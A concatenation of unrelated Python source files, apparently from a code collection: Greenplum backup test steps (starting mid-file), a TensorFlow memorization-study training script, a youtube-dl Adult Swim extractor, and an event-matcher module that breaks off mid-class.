if (line.startswith(comment_expr) or line.startswith(comment_data_expr_a) or line.startswith(comment_data_expr_b)):
name_k, type_k, schema_k = get_comment_keys(line)
if (name_k not in names and type_k != "Type" and schema_k != "Schema"):
raise Exception("Unknown key in the comment line of the metdata_file '%s'. Please check and confirm if the key is correct" % (metadata_file))
name_v, type_v, schema_v = get_comment_values(line)
if (type_v not in types):
raise Exception("Value of Type in the comment line '%s' of the metadata_file '%s' does not fall under the expected list %s. Please check if the value is correct" %(type_v, metadata_file, types))
if not line:
raise Exception('Metadata file has no data')
finally:
if fd:
fd.close()
@given('verify the metadata dump file does not contain "{target}"')
@when('verify the metadata dump file does not contain "{target}"')
@then('verify the metadata dump file does not contain "{target}"')
def impl(context, target):
metadata_path = __get_dump_metadata_path(context, master_data_dir)
fd = None
try:
fd = gzip.open(metadata_path, 'r')
line = None
for line in fd:
if target in line:
raise Exception("Unexpectedly found %s in metadata file %s" % (target, metadata_path))
if not line:
raise Exception('Metadata file has no data')
finally:
if fd:
fd.close()
@given('verify the metadata dump file does contain "{target}"')
@when('verify the metadata dump file does contain "{target}"')
@then('verify the metadata dump file does contain "{target}"')
def impl(context, target):
metadata_path = __get_dump_metadata_path(context, master_data_dir)
fd = None
try:
fd = gzip.open(metadata_path, 'r')
line = None
for line in fd:
if target in line:
return
if not line:
raise Exception('Metadata file has no data')
raise Exception("Missing text %s in metadata file %s" % (target, metadata_path))
finally:
if fd:
fd.close()
def __get_dump_metadata_path(context, dump_dir):
filename = "gp_dump_1_1_%s.gz" % context.backup_timestamp
metadata_path = os.path.join(dump_dir, "db_dumps", context.backup_timestamp[0:8], filename)
return metadata_path
def get_comment_keys(line):
try:
temp = line[len_start_comment_expr:]
tokens = temp.strip().split(';')
name = tokens[0].split(':')[0].strip()
type = tokens[1].split(':')[0].strip()
schema = tokens[2].split(':')[0].strip()
except:
return (None, None, None)
return (name, type, schema)
def get_comment_values(line):
try:
temp = line[len_start_comment_expr:]
tokens = temp.strip().split(';')
name = tokens[0].split(':')[1].strip()
type = tokens[1].split(':')[1].strip()
schema = tokens[2].split(':')[1].strip()
except:
return (None, None, None)
return (name, type, schema)
@given('{command} should print {out_msg} to stdout {num} times')
@when('{command} should print {out_msg} to stdout {num} times')
@then('{command} should print {out_msg} to stdout {num} times')
def impl(context, command, out_msg, num):
msg_list = context.stdout_message.split('\n')
msg_list = [x.strip() for x in msg_list]
count = msg_list.count(out_msg)
if count != int(num):
raise Exception("Expected %s to occur %s times. Found %d" % (out_msg, num, count))
@given('verify that {filetype} file is generated in {dir}')
@when('verify that {filetype} file is generated in {dir}')
@then('verify that {filetype} file is generated in {dir}')
def impl(context, filetype, dir):
if dir == 'master_data_directory':
dir = master_data_dir
if filetype == 'report':
filename = '%s/gp_restore_%s.rpt' % (dir, context.backup_timestamp)
if not os.path.isfile(filename):
raise Exception('Report file %s is not present in master data directory' % filename)
elif filetype == 'status':
gparray = GpArray.initFromCatalog(dbconn.DbURL())
if dir == 'segment_data_directory':
primary_segs = [seg for seg in gparray.getDbList() if seg.isSegmentPrimary()]
for seg in primary_segs:
host = seg.getSegmentHostName()
seg_data_dir = seg.getSegmentDataDirectory()
cmd = Command('check status file', "ls %s/gp_restore_status_*_%s" % (seg_data_dir, context.backup_timestamp), ctxt=REMOTE, remoteHost=host)
cmd.run(validateAfter=True)
results = cmd.get_results()
if not results.stdout.strip():
raise Exception('Status file ending with timestamp %s is not present in segment %s data directory' % (context.backup_timestamp, host))
else:
count = 0
primary_segs = [seg for seg in gparray.getDbList() if seg.isSegmentPrimary()]
for seg in primary_segs:
host = seg.getSegmentHostName()
cmd = Command('check status file', "ls %s/gp_restore_status_*_%s" % (dir, context.backup_timestamp), ctxt=REMOTE, remoteHost=host)
cmd.run(validateAfter=True)
results = cmd.get_results()
if results.stdout.strip():
count += 1
else:
raise Exception('Status file not found in segment: %s' % host)
segs = len(primary_segs)
if count != segs:
raise Exception('Expected %d status file but found %d' % (segs, count))
@given('there are no {filetype} files in "{dir}"')
@when('there are no {filetype} files in "{dir}"')
@then('there are no {filetype} files in "{dir}"')
def impl(context, filetype, dir):
if filetype == 'report':
if dir == 'master_data_directory':
dir = master_data_dir
filenames = os.listdir(dir)
for filename in filenames:
if filename.startswith('gp_restore') and filename.endswith('.rpt'):
filename = '%s/%s' % (dir, filename)
os.remove(filename)
if filetype == 'status':
gparray = GpArray.initFromCatalog(dbconn.DbURL())
if dir == 'segment_data_directory':
primary_segs = [seg for seg in gparray.getDbList() if seg.isSegmentPrimary()]
for seg in primary_segs:
host = seg.getSegmentHostName()
seg_data_dir = seg.getSegmentDataDirectory()
cmd = Command('remove status file', "rm -f %s/gp_restore_status_*" % (seg_data_dir), ctxt=REMOTE, remoteHost=host)
cmd.run(validateAfter=True)
else:
primary_segs = [seg for seg in gparray.getDbList() if seg.isSegmentPrimary()]
for seg in primary_segs:
host = seg.getSegmentHostName()
cmd = Command('remove status file', "rm -f %s/gp_restore_status_*" % dir, ctxt=REMOTE, remoteHost=host)
cmd.run(validateAfter=True)
@given('the mail_contacts file does not exist')
@then('the mail_contacts file does not exist')
def impl(context):
if "HOME" in os.environ:
home_mail_file = os.path.join(os.environ["HOME"], "mail_contacts")
if CheckFile(home_mail_file).run():
os.remove(home_mail_file)
if "GPHOME" in os.environ:
mail_file = os.path.join(os.environ["GPHOME"], "bin", "mail_contacts")
if CheckFile(mail_file).run():
os.remove(mail_file)
@given('the mail_contacts file exists')
def impl(context):
context.email_contact = "example_test@gopivotal.com"
if "HOME" in os.environ:
home_mail_file = os.path.join(os.environ["HOME"], "mail_contacts")
mail_contact = home_mail_file
elif "GPHOME" in os.environ:
mail_file = os.path.join(os.environ["GPHOME"], "bin", "mail_contacts")
mail_contact = mail_file
f = file(mail_contact, 'w+')
f.write(context.email_contact)
f.close
@given('the yaml file "{email_file_path}" stores email details is in proper format')
def impl(context, email_file_path):
try:
validate_parse_email_file(context, email_file_path)
except Exception as e:
raise Exception(str(e))
@given('the yaml file "{email_file_path}" stores email details is not in proper format')
def impl(context, email_file_path):
exception_raised = False
try:
validate_parse_email_file(context, email_file_path)
except Exception as e:
exception_raised = True
if exception_raised == False:
raise Exception("File is in proper format")
@then('verify that emails are sent to the given contacts with appropriate messages after backup of "{dblist}"')
def impl(context, dblist):
cmd_list = []
sending_email_list = []
database_list = dblist.split(',')
stdout = context.stdout_message
for line in stdout.splitlines():
if "Sending mail to" in line:
str = line.split(':-')[1]
sending_email_list.append(str.strip())
if "Email command string=" in line:
log_msg, delim, txt = line.partition('=')
cmd_list.append(txt.strip())
if len(sending_email_list) != len(database_list):
raise Exception("Emails are not sent properly")
count = 0
for dbname in database_list:
#expected email details
for email in context.email_details:
if dbname in email['DBNAME']:
expected_from = email['FROM']
expected_sub = email['SUBJECT']
else:
expected_sub = "Report from gpcrondump on host %s [COMPLETED]" % socket.gethostname()
#original email details
result_cmd = cmd_list[count]
str = result_cmd[result_cmd.find("-s")+4:]
result_sub = (str[:str.find('"')]).strip()
if expected_sub != result_sub:
raise Exception("Subject of the sent email is not correct")
if result_cmd.find("-- -f") >= 0:
result_from = result_cmd[result_cmd.find("-- -f")+6:]
if expected_from != result_from:
raise Exception("ef : RF", expected_from, result_from, count)
#raise Exception("Sender of the sent email is not correct")
count += 1
@then('gpcrondump should print unable to send dump email notification to stdout as warning')
def impl(context):
stdout = context.stdout_message
found = False
for line in stdout.splitlines():
if "Unable to send dump email notification" in line:
found = True
if found is False:
raise Exception("'Unable to send dump email notification' exception is not raised")
@then('verify that function is backedup correctly in "{dumpfile}"')
def impl(context, dumpfile):
buf = """CREATE ORDERED AGGREGATE agg_array(anyelement) (
SFUNC = array_append,
STYPE = anyarray,
INITCOND = '{}'
);"""
if not buf in open(dumpfile).read():
raise Exception("pg_dump did not backup aggregate functions correctly.")
@given('verify that a role "{role_name}" exists in database "{dbname}"')
@then('verify that a role "{role_name}" exists in database "{dbname}"')
def impl(context, role_name, dbname):
query = "select rolname from pg_roles where rolname = '%s'" % role_name
conn = dbconn.connect(dbconn.DbURL(dbname=dbname))
try:
result = getRows(dbname, query)[0][0]
if result != role_name:
raise Exception("Role %s does not exist in database %s." % (role_name, dbname))
except:
raise Exception("Role %s does not exist in database %s." % (role_name, dbname))
@given('there is a list of files "{filenames}" of tables "{table_list}" in "{dbname}" exists for validation')
@when('there is a list of files "{filenames}" of tables "{table_list}" in "{dbname}" exists for validation')
@then('there is a list of files "{filenames}" of tables "{table_list}" in "{dbname}" exists for validation')
def impl(context, filenames, table_list, dbname):
files = [f for f in filenames.split(',')]
tables = [t for t in table_list.split(',')]
for t,f in zip(tables,files):
backup_data_to_file(context, t, dbname, f)
@when('verify with backedup file "{filename}" that there is a "{table_type}" table "{tablename}" in "{dbname}" with data')
@then('verify with backedup file "{filename}" that there is a "{table_type}" table "{tablename}" in "{dbname}" with data')
def impl(context, filename, table_type, tablename, dbname):
if not check_table_exists(context, dbname=dbname, table_name=tablename, table_type=table_type):
raise Exception("Table '%s' does not exist when it should" % tablename)
validate_restore_data_in_file(context, tablename, dbname, filename)
@then('verify that the owner of "{dbname}" is "{expected_owner}"')
def impl(context, dbname, expected_owner):
with dbconn.connect(dbconn.DbURL(dbname=dbname)) as conn:
query = "SELECT pg_catalog.pg_get_userbyid(d.datdba) FROM pg_catalog.pg_database d WHERE d.datname = '%s';" % dbname
actual_owner = dbconn.execSQLForSingleton(conn, query)
if actual_owner != expected_owner:
raise Exception("Database %s has owner %s when it should have owner %s" % (dbname, actual_owner, expected_owner))
@then('verify that {obj} "{objname}" exists in schema "{schemaname}" and database "{dbname}"')
def impl(context, obj, objname, schemaname, dbname):
if obj == 'function':
cmd_sql = "select exists(select '%s.%s'::regprocedure)" % (schemaname, objname)
else:
cmd_sql = "select exists(select * from pg_class where relname='%s' and relnamespace=(select oid from pg_namespace where nspname='%s'))" % (objname, schemaname)
with dbconn.connect(dbconn.DbURL(dbname=dbname)) as conn:
exists = dbconn.execSQLForSingletonRow(conn, cmd_sql)
if exists[0] is not True:
raise Exception("The %s '%s' does not exists in schema '%s' and database '%s' " % (obj, objname, schemaname, dbname) )
@then('verify that "{configString}" appears in the datconfig for database "{dbname}"')
def impl(context, configString, dbname):
with dbconn.connect(dbconn.DbURL(dbname=dbname)) as conn:
query = "select datconfig from pg_database where datname in ('%s');" % dbname
datconfig = dbconn.execSQLForSingleton(conn, query)
if not datconfig or configString not in datconfig:
raise Exception("%s is not in the datconfig for database '%s':\n %s" % (configString, dbname, datconfig))
|
|
# coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Model training with TensorFlow eager execution."""
import os
import time
from absl import app
from absl import flags
from absl import logging
import tensorflow.compat.v2 as tf
from extreme_memorization import alignment
from extreme_memorization import cifar100_dataset
from extreme_memorization import cifar10_dataset
from extreme_memorization import convnet
from extreme_memorization import mlp
from extreme_memorization import svhn_dataset
FLAGS = flags.FLAGS
flags.DEFINE_integer('log_interval', 10,
'batches between logging training status')
# 1k epochs.
flags.DEFINE_integer('train_epochs', 2000,
'batches between logging training status')
flags.DEFINE_string('output_dir', '/tmp/tensorflow/generalization/',
'Directory to write TensorBoard summaries')
flags.DEFINE_string('model_dir', '/tmp/tensorflow/generalization/checkpoints/',
'Directory to write TensorBoard summaries')
flags.DEFINE_string('train_input_files',
'/tmp/cifar10/image_cifar10_fingerprint-train*',
'Input pattern for training tfrecords.')
flags.DEFINE_string('test_input_files',
'/tmp/cifar10/image_cifar10_fingerprint-dev*',
'Input pattern for test tfrecords.')
flags.DEFINE_float('learning_rate', 0.01, 'Learning rate.')
flags.DEFINE_bool('no_gpu', False,
'disables GPU usage even if a GPU is available')
flags.DEFINE_bool('custom_init', False, 'Use custom initializers for w_1.')
flags.DEFINE_bool('shuffled_labels', False,
'Use randomized labels instead of true labels.')
flags.DEFINE_float('stddev', 0.001, 'Stddev for random normal init.')
flags.DEFINE_integer('num_units', 1024, 'Number of hidden units.')
flags.DEFINE_integer(
'batch_size', 256, 'Batch size for training and evaluation. When using '
'multiple gpus, this is the global batch size for '
'all devices. For example, if the batch size is 32 '
'and there are 4 GPUs, each GPU will get 8 examples on '
'each step.')
flags.DEFINE_enum(
'model_type', 'mlp', ['mlp', 'convnet'],
'Model architecture type. Either a 2-layer MLP or a ConvNet.')
flags.DEFINE_enum(
'loss_function', 'cross_entropy', ['cross_entropy', 'hinge', 'l2'],
'Choice of loss functions between cross entropy or multi-class hinge'
'or squared loss.')
flags.DEFINE_enum(
'dataset', 'cifar10', ['cifar10', 'cifar100', 'svhn'],
'Which tf.data.Dataset object to initialize.')
flags.DEFINE_enum(
'activation', 'relu', ['sin', 'relu', 'sigmoid'],
'Activation function to be used for MLP model type.')
flags.DEFINE_enum(
'data_format', None, ['channels_first', 'channels_last'],
'A flag to override the data format used in the model. '
'channels_first provides a performance boost on GPU but is not '
'always compatible with CPU. If left unspecified, the data format '
'will be chosen automatically based on whether TensorFlow was '
'built for CPU or GPU.')
def get_dataset():
if FLAGS.dataset == 'cifar10':
return cifar10_dataset
elif FLAGS.dataset == 'cifar100':
return cifar100_dataset
elif FLAGS.dataset == 'svhn':
return svhn_dataset
def get_activation():
if FLAGS.activation == 'sin':
return tf.math.sin
elif FLAGS.activation == 'relu':
return tf.nn.relu
elif FLAGS.activation == 'sigmoid':
return tf.math.sigmoid
def gather_2d(params, indices):
"""Gathers from `params` with a 2D batched `indices` array.
Args:
params: [D0, D1, D2 ... Dn] Tensor
indices: [D0, D1'] integer Tensor
Returns:
result: [D0, D1', D2 ... Dn] Tensor, where
result[i, j, ...] = params[i, indices[i, j], ...]
Raises:
ValueError: if more than one entries in [D2 ... Dn] are not known.
"""
d0 = tf.shape(params)[0]
d1 = tf.shape(params)[1]
d2_dn = params.shape.as_list()[2:]
none_indices = [i for i, s in enumerate(d2_dn) if s is None]
if none_indices:
if len(none_indices) > 1:
raise ValueError(
'More than one entry in D2 ... Dn not known for Tensor %s.' % params)
d2_dn[none_indices[0]] = -1
flatten_params = tf.reshape(params, [d0 * d1] + d2_dn)
flatten_indices = tf.expand_dims(tf.range(d0) * d1, 1) + tf.cast(
indices, dtype=tf.int32)
return tf.gather(flatten_params, flatten_indices)
def hinge_loss(labels, logits):
"""Multi-class hinge loss.
Args:
labels: [batch_size] integer Tensor of correct class labels.
logits: [batch_size, num_classes] Tensor of prediction scores.
Returns:
[batch_size] Tensor of the hinge loss value.
"""
label_logits = gather_2d(logits, tf.expand_dims(labels, 1))
return tf.reduce_sum(
tf.math.maximum(0, logits - label_logits + 1.0), axis=1) - 1.0
def get_squared_loss(logits, labels):
onehot_labels = tf.one_hot(indices=labels, depth=get_dataset().NUM_LABELS)
diff = logits - tf.to_float(onehot_labels)
loss_vector = tf.reduce_mean(tf.square(diff), axis=1)
return tf.reduce_mean(loss_vector), loss_vector
def get_softmax_loss(logits, labels):
loss_vector = tf.nn.sparse_softmax_cross_entropy_with_logits(
logits=logits, labels=labels)
return tf.reduce_mean(loss_vector), loss_vector
def get_hinge_loss(logits, labels):
loss_vector = hinge_loss(labels=labels, logits=logits)
return tf.reduce_mean(loss_vector), loss_vector
def loss(logits, labels):
if FLAGS.loss_function == 'cross_entropy':
return get_softmax_loss(logits, labels)
elif FLAGS.loss_function == 'hinge':
return get_hinge_loss(logits, labels)
elif FLAGS.loss_function == 'l2':
return get_squared_loss(logits, labels)
def compute_accuracy(logits, labels):
predictions = tf.argmax(logits, axis=1, output_type=tf.int64)
labels = tf.cast(labels, tf.int64)
return tf.reduce_mean(
tf.cast(tf.equal(predictions, labels), dtype=tf.float32))
def get_image_labels(features, shuffled_labels=False):
images = features['image/encoded']
if shuffled_labels:
labels = features['image/class/shuffled_label']
else:
labels = features['image/class/label']
return images, labels
def train(model, optimizer, dataset, step_counter, log_interval=None):
"""Trains model on `dataset` using `optimizer`."""
start = time.time()
for (batch, (features)) in enumerate(dataset):
images, labels = get_image_labels(features, FLAGS.shuffled_labels)
# Record the operations used to compute the loss given the input,
# so that the gradient of the loss with respect to the variables
# can be computed.
with tf.GradientTape(persistent=True) as tape:
tape.watch(images)
logits = model(images, labels, training=True, step=step_counter)
tape.watch(logits)
loss_value, loss_vector = loss(logits, labels)
loss_vector = tf.unstack(loss_vector)
tf.summary.scalar('loss', loss_value, step=step_counter)
tf.summary.scalar(
'accuracy', compute_accuracy(logits, labels), step=step_counter)
logit_grad_vector = []
for i, per_example_loss in enumerate(loss_vector):
logits_grad = tape.gradient(per_example_loss, logits)
logit_grad_vector.append(tf.unstack(logits_grad)[i])
variables = model.trainable_variables
per_label_grads = {}
for label in range(get_dataset().NUM_LABELS):
per_label_grads[label] = []
per_example_grads = []
for i, (per_example_loss, label, logit_grad) in enumerate(
zip(loss_vector, labels, logit_grad_vector)):
grads = tape.gradient(per_example_loss, variables)
grads.append(logit_grad)
per_example_grads.append((grads, label))
per_label_grads[int(label.numpy())].append(grads)
for i, var in enumerate(variables + [logits]):
if i < len(variables):
var_name = var.name
else:
# Last one is logits.
var_name = 'logits'
grad_list = [(grads[0][i], grads[1]) for grads in per_example_grads]
if grad_list[0][0] is None:
logging.info('grad_list none: %s', var_name)
continue
# Okay to restrict this to 10, even for CIFAR100 since this adds a
# significant compute overhead.
for label in range(10):
label_grad_list = [
grad[0] for grad in grad_list if tf.math.equal(grad[1], label)
]
if not label_grad_list:
logging.info('label_grad_list none: %s', var_name)
continue
label_grad_list = [tf.reshape(grad, [-1]) for grad in label_grad_list]
if len(label_grad_list) > 1:
ggmm = alignment.compute_alignment(label_grad_list)
key = 'grad_alignment/%s/%s' % (label, var_name)
tf.summary.scalar(key, ggmm, step=step_counter)
# Compute gradients, only for trainable variables.
variables = model.trainable_variables
grads = tape.gradient(loss_value, variables)
# Tuple is used for py3, where zip is a generator producing values once.
grads_and_vars = tuple(zip(grads, model.trainable_variables))
for g, v in grads_and_vars:
if g is not None:
tf.summary.scalar(
'Norm/Grad/%s' % v.name, tf.norm(g), step=step_counter)
# Chart all variables.
for v in model.variables:
tf.summary.scalar('Norm/Var/%s' % v.name, tf.norm(v), step=step_counter)
optimizer.apply_gradients(zip(grads, model.trainable_variables))
if log_interval and batch % log_interval == 0:
rate = log_interval / (time.time() - start)
print('Step #%d\tLoss: %.6f (%d steps/sec)' % (batch, loss_value, rate))
start = time.time()
def test(model, dataset, step_counter):
"""Perform an evaluation of `model` on the examples from `dataset`."""
avg_loss = tf.keras.metrics.Mean('loss', dtype=tf.float32)
accuracy = tf.keras.metrics.Accuracy('accuracy', dtype=tf.float32)
for features in dataset:
images, labels = get_image_labels(features, FLAGS.shuffled_labels)
logits = model(images, labels, training=False, step=step_counter)
loss_value, _ = loss(logits, labels)
avg_loss(loss_value)
accuracy(
tf.argmax(logits, axis=1, output_type=tf.int64),
tf.cast(labels, tf.int64))
print('Test set: Average loss: %.4f, Accuracy: %4f%%\n' %
(avg_loss.result(), 100 * accuracy.result()))
with tf.summary.always_record_summaries():
tf.summary.scalar('loss', avg_loss.result(), step=step_counter)
tf.summary.scalar('accuracy', accuracy.result(), step=step_counter)
def run_eager():
"""Run training and eval loop in eager mode."""
# No need to run tf.enable_eager_execution() since its supposed to be on by
# default in TF2.0
# Automatically determine device and data_format
(device, data_format) = ('/gpu:0', 'channels_first')
if FLAGS.no_gpu or not tf.test.is_gpu_available():
(device, data_format) = ('/cpu:0', 'channels_last')
# If data_format is defined in FLAGS, overwrite automatically set value.
if FLAGS.data_format is not None:
data_format = FLAGS.data_format
print('Using device %s, and data format %s.' % (device, data_format))
# Its important to set the data format before the model is built, conv layers
# usually need it.
tf.keras.backend.set_image_data_format(data_format)
# Load the datasets
train_ds = get_dataset().dataset_randomized(
FLAGS.train_input_files).shuffle(10000).batch(FLAGS.batch_size)
test_ds = get_dataset().dataset_randomized(FLAGS.test_input_files).batch(
FLAGS.batch_size)
# Create the model and optimizer
if FLAGS.model_type == 'mlp':
model = mlp.MLP(FLAGS.num_units, FLAGS.stddev, get_activation(),
FLAGS.custom_init,
get_dataset().NUM_LABELS)
elif FLAGS.model_type == 'convnet':
model = convnet.ConvNet(get_dataset().NUM_LABELS)
optimizer = tf.keras.optimizers.SGD(FLAGS.learning_rate)
# Create file writers for writing TensorBoard summaries.
if FLAGS.output_dir:
# Create directories to which summaries will be written
# tensorboard --logdir=<output_dir>
# can then be used to see the recorded summaries.
train_dir = os.path.join(FLAGS.output_dir, 'train')
test_dir = os.path.join(FLAGS.output_dir, 'eval')
tf.io.gfile.mkdir(FLAGS.output_dir)
else:
train_dir = None
test_dir = None
summary_writer = tf.summary.create_file_writer(train_dir, flush_millis=10000)
test_summary_writer = tf.summary.create_file_writer(
test_dir, flush_millis=10000, name='test')
# Create and restore checkpoint (if one exists on the path)
checkpoint_prefix = os.path.join(FLAGS.model_dir, 'ckpt')
checkpoint = tf.train.Checkpoint(model=model, optimizer=optimizer)
# Restore variables on creation if a checkpoint exists.
checkpoint.restore(tf.train.latest_checkpoint(FLAGS.model_dir))
# Train and evaluate for a set number of epochs.
with tf.device(device):
for _ in range(FLAGS.train_epochs):
start = time.time()
with summary_writer.as_default():
train(model, optimizer, train_ds, optimizer.iterations,
FLAGS.log_interval)
end = time.time()
print('\nTrain time for epoch #%d (%d total steps): %f' %
(checkpoint.save_counter.numpy() + 1, optimizer.iterations.numpy(),
end - start))
with test_summary_writer.as_default():
test(model, test_ds, optimizer.iterations)
checkpoint.save(checkpoint_prefix)
def main(_):
run_eager()
if __name__ == '__main__':
app.run(main)
|
|
# coding: utf-8
from __future__ import unicode_literals
import re
from .common import InfoExtractor
from ..utils import (
determine_ext,
ExtractorError,
float_or_none,
xpath_text,
)
class AdultSwimIE(InfoExtractor):
_VALID_URL = r'https?://(?:www\.)?adultswim\.com/videos/(?P<is_playlist>playlists/)?(?P<show_path>[^/]+)/(?P<episode_path>[^/?#]+)/?'
_TESTS = [{
'url': 'http://adultswim.com/videos/rick-and-morty/pilot',
'playlist': [
{
'md5': '247572debc75c7652f253c8daa51a14d',
'info_dict': {
'id': 'rQxZvXQ4ROaSOqq-or2Mow-0',
'ext': 'flv',
'title': 'Rick and Morty - Pilot Part 1',
'description': "Rick moves in with his daughter's family and establishes himself as a bad influence on his grandson, Morty. "
},
},
{
'md5': '77b0e037a4b20ec6b98671c4c379f48d',
'info_dict': {
'id': 'rQxZvXQ4ROaSOqq-or2Mow-3',
'ext': 'flv',
'title': 'Rick and Morty - Pilot Part 4',
'description': "Rick moves in with his daughter's family and establishes himself as a bad influence on his grandson, Morty. "
},
},
],
'info_dict': {
'id': 'rQxZvXQ4ROaSOqq-or2Mow',
'title': 'Rick and Morty - Pilot',
'description': "Rick moves in with his daughter's family and establishes himself as a bad influence on his grandson, Morty. "
}
}, {
'url': 'http://www.adultswim.com/videos/playlists/american-parenting/putting-francine-out-of-business/',
'playlist': [
{
'md5': '2eb5c06d0f9a1539da3718d897f13ec5',
'info_dict': {
'id': '-t8CamQlQ2aYZ49ItZCFog-0',
'ext': 'flv',
'title': 'American Dad - Putting Francine Out of Business',
'description': 'Stan hatches a plan to get Francine out of the real estate business.Watch more American Dad on [adult swim].'
},
}
],
'info_dict': {
'id': '-t8CamQlQ2aYZ49ItZCFog',
'title': 'American Dad - Putting Francine Out of Business',
'description': 'Stan hatches a plan to get Francine out of the real estate business.Watch more American Dad on [adult swim].'
},
}, {
'url': 'http://www.adultswim.com/videos/tim-and-eric-awesome-show-great-job/dr-steve-brule-for-your-wine/',
'playlist': [
{
'md5': '3e346a2ab0087d687a05e1e7f3b3e529',
'info_dict': {
'id': 'sY3cMUR_TbuE4YmdjzbIcQ-0',
'ext': 'flv',
'title': 'Tim and Eric Awesome Show Great Job! - Dr. Steve Brule, For Your Wine',
'description': 'Dr. Brule reports live from Wine Country with a special report on wines. \r\nWatch Tim and Eric Awesome Show Great Job! episode #20, "Embarrassed" on Adult Swim.\r\n\r\n',
},
}
],
'info_dict': {
'id': 'sY3cMUR_TbuE4YmdjzbIcQ',
'title': 'Tim and Eric Awesome Show Great Job! - Dr. Steve Brule, For Your Wine',
'description': 'Dr. Brule reports live from Wine Country with a special report on wines. \r\nWatch Tim and Eric Awesome Show Great Job! episode #20, "Embarrassed" on Adult Swim.\r\n\r\n',
},
}]
@staticmethod
def find_video_info(collection, slug):
for video in collection.get('videos'):
if video.get('slug') == slug:
return video
@staticmethod
def find_collection_by_linkURL(collections, linkURL):
for collection in collections:
if collection.get('linkURL') == linkURL:
return collection
@staticmethod
def find_collection_containing_video(collections, slug):
for collection in collections:
for video in collection.get('videos'):
if video.get('slug') == slug:
return collection, video
return None, None
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
show_path = mobj.group('show_path')
episode_path = mobj.group('episode_path')
is_playlist = True if mobj.group('is_playlist') else False
webpage = self._download_webpage(url, episode_path)
# Extract the value of `bootstrappedData` from the Javascript in the page.
bootstrapped_data = self._parse_json(self._search_regex(
r'var bootstrappedData = ({.*});', webpage, 'bootstraped data'), episode_path)
# Downloading videos from a /videos/playlist/ URL needs to be handled differently.
# NOTE: We are only downloading one video (the current one) not the playlist
if is_playlist:
collections = bootstrapped_data['playlists']['collections']
collection = self.find_collection_by_linkURL(collections, show_path)
video_info = self.find_video_info(collection, episode_path)
show_title = video_info['showTitle']
segment_ids = [video_info['videoPlaybackID']]
else:
collections = bootstrapped_data['show']['collections']
collection, video_info = self.find_collection_containing_video(collections, episode_path)
# Video wasn't found in the collections, let's try `slugged_video`.
if video_info is None:
if bootstrapped_data.get('slugged_video', {}).get('slug') == episode_path:
video_info = bootstrapped_data['slugged_video']
else:
raise ExtractorError('Unable to find video info')
show = bootstrapped_data['show']
show_title = show['title']
stream = video_info.get('stream')
clips = [stream] if stream else video_info['clips']
segment_ids = [clip['videoPlaybackID'] for clip in clips]
episode_id = video_info['id']
episode_title = video_info['title']
episode_description = video_info['description']
episode_duration = video_info.get('duration')
entries = []
for part_num, segment_id in enumerate(segment_ids):
segment_url = 'http://www.adultswim.com/videos/api/v0/assets?id=%s&platform=desktop' % segment_id
segment_title = '%s - %s' % (show_title, episode_title)
if len(segment_ids) > 1:
segment_title += ' Part %d' % (part_num + 1)
idoc = self._download_xml(
segment_url, segment_title,
'Downloading segment information', 'Unable to download segment information')
segment_duration = float_or_none(
xpath_text(idoc, './/trt', 'segment duration').strip())
formats = []
file_els = idoc.findall('.//files/file') or idoc.findall('./files/file')
unique_urls = []
unique_file_els = []
for file_el in file_els:
media_url = file_el.text
if not media_url or determine_ext(media_url) == 'f4m':
continue
if file_el.text not in unique_urls:
unique_urls.append(file_el.text)
unique_file_els.append(file_el)
for file_el in unique_file_els:
bitrate = file_el.attrib.get('bitrate')
ftype = file_el.attrib.get('type')
media_url = file_el.text
if determine_ext(media_url) == 'm3u8':
formats.extend(self._extract_m3u8_formats(
media_url, segment_title, 'mp4', 'm3u8_native', preference=0, m3u8_id='hls'))
else:
formats.append({
'format_id': '%s_%s' % (bitrate, ftype),
'url': file_el.text.strip(),
# The bitrate may not be a number (for example: 'iphone')
'tbr': int(bitrate) if bitrate.isdigit() else None,
})
self._sort_formats(formats)
entries.append({
'id': segment_id,
'title': segment_title,
'formats': formats,
'duration': segment_duration,
'description': episode_description
})
return {
'_type': 'playlist',
'id': episode_id,
'display_id': episode_path,
'entries': entries,
'title': '%s - %s' % (show_title, episode_title),
'description': episode_description,
'duration': episode_duration
}
|
|
'''
Created on 2015/06/01
:author: hubo
'''
from __future__ import print_function, absolute_import, division
import warnings
class IsMatchExceptionWarning(Warning):
pass
class EventMatcher(object):
'''
A matcher to match an event
'''
def __init__(self, indices, judgeFunc = None):
# cut indices into real size
for i in range(len(indices) - 1, -1, -1):
if indices[i] is not None:
break
self.indices = indices[:i+1]
if judgeFunc is not None:
def _warning_judge(e):
try:
return judgeFunc(e)
except Exception as exc:
# Do not crash
warnings.warn(IsMatchExceptionWarning('Exception raised when _ismatch is calculated: %r. event = %r, matcher = %r, _ismatch = %r'
% (exc, e, self, judgeFunc)))
return False
self.judge = _warning_judge
def judge(self, event):
return True
def isMatch(self, event, indexStart = 0):
if len(self.indices) > len(event.indices):
return False
for i in range(indexStart, len(self.indices)):
if self.indices[i] is not None and self.indices[i] != event.indices[i]:
return False
return self.judge(event)
def __repr__(self):
cls = type(self)
return '<EventMatcher:' + \
repr(self.indices) + '>'
def __await__(self):
"""
event = yield from matcher
or
event = await matcher
"""
ev, _ = yield (self,)
return ev
class M_(object):
"""
Awaitable object for multiple matchers
```
event, matcher = await M_(matcher1, matcher2)
```
"""
__slots__ = ('_matchers',)
def __init__(self, *matchers):
self._matchers = matchers
def __await__(self):
"""
```
event, matcher = yield from M_(matcher1, matcher2)
```
equivalent to
```
event, matcher = yield (matcher1, matcher2)
```
"""
return (yield self._matchers)
class DiffRef_(object):
"""
Append some matchers to a diff without breaking the difference structure
"""
__slots__ = ('origin', 'add', 'result', 'length')
def __init__(self, origin, add):
self.origin = origin
self.add = add
self.result = None
self.length = None
def __add__(self, matchers):
return DiffRef_(self.origin, self.add + matchers)
def __iter__(self):
if self.result is None:
self.result = tuple(self.origin) + self.add
return iter(self.result)
def __len__(self):
return len(self.origin) + len(self.add)
def two_way_difference(self, b):
"""
Return (self - b, b - self)
"""
return self.origin.two_way_difference(b, self.add)
def __await__(self):
return (yield self)
class Diff_(object):
"""
